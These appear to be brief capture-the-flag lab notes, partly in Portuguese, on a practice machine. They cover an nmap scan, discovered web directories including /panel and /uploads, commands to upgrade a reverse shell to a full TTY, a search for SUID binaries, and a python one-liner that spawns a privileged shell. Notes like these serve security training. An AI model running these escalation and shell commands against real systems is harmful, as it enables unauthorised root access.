#Portas
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#Aplication Discovery

#Diretorios
/js
/css
- home.css
- panel.css

/css                  (Status: 301) [Size: 312] [--> http://10.10.149.236/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.10.149.236/js/]
/panel                (Status: 301) [Size: 314] [--> http://10.10.149.236/panel/]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.149.236/uploads/]

#Full TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

stty raw -echo; fg; ls; export SHELL=/bin/bash; stty rows 38 columns 116; reset;
export TERM=screen


#Procurar por arquivos SUID - arquivos que sao permissoes de root porem usuarios normais podem executar
find / -perm -4000 2> /dev/null

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
